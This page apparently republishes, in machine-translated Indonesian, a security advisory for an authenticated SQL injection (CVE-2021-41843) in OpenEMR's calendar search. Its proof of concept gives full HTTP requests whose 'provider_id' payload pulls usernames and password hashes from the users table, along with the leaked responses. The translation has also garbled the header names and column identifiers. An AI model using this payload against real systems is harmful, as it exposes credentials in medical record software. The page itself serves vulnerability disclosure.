OpenEMR 6.0.0 / 6.1.0-dev SQL Injection

  • Whatsapp
OpenEMR 6.0.0 / 6.1.0-dev SQL Injection
OpenEMR dev SQL Injection

News.nextcloud.asia

# Penasihat Keamanan Trovent 2109-01 #
##############################################

Injeksi SQL terautentikasi dalam pencarian kalender OpenEMR
############################################################# ####

Ringkasan
########

ID Penasehat: TRSA-2109-01
Versi nasihat: 1.0
Status penasehat: Publik
URL Saran: https://trovent.io/security-advisory-2109-01
Produk yang terpengaruh: Aplikasi web OpenEMR
Versi yang diuji: 6.0.0, 6.1.0-dev
Vendor: Proyek OpenEMR, https://www.open-emr.org
Kredit: Trovent Security GmbH, Stefan Pietsch

Detil Deskripsi
#########################

Aplikasi web OpenEMR adalah perangkat lunak manajemen praktik medis dan dapat
digunakan untuk menyimpan rekam medis elektronik.
Trovent Security GmbH menemukan kerentanan injeksi SQL dalam pencarian
fungsi modul kalender. Parameter ‘provider_id’ dapat disuntikkan.
Penyerang membutuhkan akun pengguna yang valid untuk mengakses modul kalender dari
aplikasi web. Dimungkinkan untuk membaca data dari semua tabel database.

Keparahan: Sedang
Skor CVSS: 6.5 (CVSS: 3.1 / AV: N / AC: L / PR: L / UI: N / S: U / C: H / I: N / A: N)
ID CWE: CWE-89
ID CVE: CVE-2021-41843

Bukti dari konsep
################

(1) Permintaan HTTP untuk membaca nama pengguna dari tabel database ‘openemr.users_secure’:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1
Konten-Panjang: 324
Tuan Rumah: 172.18.0.3
Tipe Konten: application/x-www-form-urlencoded
Kuki: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q
Koneksi: tutup

pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021&
provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28namapengguna
%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Kirim

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(2) Tanggapan HTTP untuk (1):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/1.1 200 Oke
Tanggal: Jum, 17 Sep 2021 07:26:48 GMT
Server: Apache
Kedaluwarsa: Kam, 19 Nov 1981 08:52:00 GMT
Kontrol Cache: tanpa penyimpanan, tanpa cache, harus divalidasi ulang
Pragma: tanpa cache
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; kadaluarsa=Jumat, 17-Sep-2021 15:13:28 GMT; Usia Maks = 28000; jalur=/; SameSite=Ketat
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; kedaluwarsa=Jumat, 17-Sep-2021 15:13:29 GMT; Usia Maks = 28000; jalur=/; SameSite=Ketat
Ketat-Transportasi-Keamanan: max-usia=31536000; termasukSubDomains; pramuat
X-XSS-Perlindungan: 1; modus = blok
Konten-Panjang: 27
Koneksi: tutup
Tipe-Konten: teks/html; rangkaian karakter = utf-8

Kesalahan sintaks XPATH: ‘admin’

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(3) Permintaan HTTP untuk membaca hash kata sandi dari tabel database ‘openemr.users_secure’:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1
Konten-Panjang: 324
Tuan Rumah: 172.18.0.3
Tipe Konten: application/x-www-form-urlencoded
Kuki: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q
Koneksi: tutup

pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021&
provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28sandi
%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Kirim

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(4) Tanggapan HTTP ke (3):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/1.1 200 Oke
Tanggal: Jum, 17 Sep 2021 07:27:29 GMT
Server: Apache
Kedaluwarsa: Kam, 19 Nov 1981 08:52:00 GMT
Kontrol Cache: tanpa penyimpanan, tanpa cache, harus divalidasi ulang
Pragma: tanpa cache
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; kedaluwarsa=Jumat, 17-Sep-2021 15:14:09 GMT; Usia Maks = 28000; jalur=/; SameSite=Ketat
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; kedaluwarsa=Jumat, 17-Sep-2021 15:14:09 GMT; Usia Maks = 28000; jalur=/; SameSite=Ketat
Ketat-Transportasi-Keamanan: max-usia=31536000; termasukSubDomains; pramuat
X-XSS-Perlindungan: 1; modus = blok
Konten-Panjang: 44
Koneksi: tutup
Tipe-Konten: teks/html; rangkaian karakter = utf-8

Kesalahan sintaks XPATH: ‘$2y$10$ukudH2lRSW2vKX.’

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solusi / Solusi
###########################

Batasi akses ke fungsi pencarian kalender hingga kerentanan diperbaiki.

Diperbaiki di OpenEMR versi 6.0.0 patch 3, diverifikasi oleh Trovent.

Sejarah
#######

2021-09-16: Kerentanan ditemukan
2021-09-29: Penasihat dibuat & vendor dihubungi
2021-09-30: Vendor mengakui kerentanan, ID CVE diminta
2021-10-01: ID CVE diterima
2021-10-19: Vendor merilis patch OpenEMR versi 6.0.0 3
2021-12-14: Tambahkan informasi tentang versi tetap
2021-12-15: Penasihat diterbitkan

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *